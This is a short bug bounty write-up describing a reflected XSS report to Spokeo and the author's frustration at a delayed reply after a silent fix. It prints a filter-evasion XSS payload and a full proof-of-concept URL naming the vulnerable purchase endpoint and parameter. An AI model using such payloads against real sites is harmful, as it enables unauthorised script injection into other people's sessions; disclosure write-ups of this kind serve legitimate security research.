Spokeo Bug bounty Experience

Recently I reported a XSS bug at spokeo bug bounty program.

I don’t want to blame the company, sometimes we face like this.

Program : https://www.spokeo.com/security

XSS Playload:
“‘ — !></Script%0C><Script%0C>confirm(1)</Script/%0C>#

Endpoint : All purchase type -> “/purchase?addr_num=6&q=6+130th+Ave+SE,+Bellevue,+WA+98005'&type=inject” parameter

XSS POC:

— — — —-
https://www.spokeo.com/purchase?addr_num=6&q=6+130th+Ave+SE,+Bellevue,+WA+98005'&type=address""'--!></Script%0C><Script%0C>prompt(document.domain)</Script/%0C>&url=/WA/Bellevue/6-130th-Ave-SE'

PoC:

After reported I was waiting and checking regularly is that fix or any reply. But no response. After 9 days I checked the xss been fixed. Then again message them, the issue has been fixed. Then they reply :(

Reply:

Shocking response!

Question is,

Why you response after fix and 9 days later?

:(

Thanks for reading.

Happy hunting!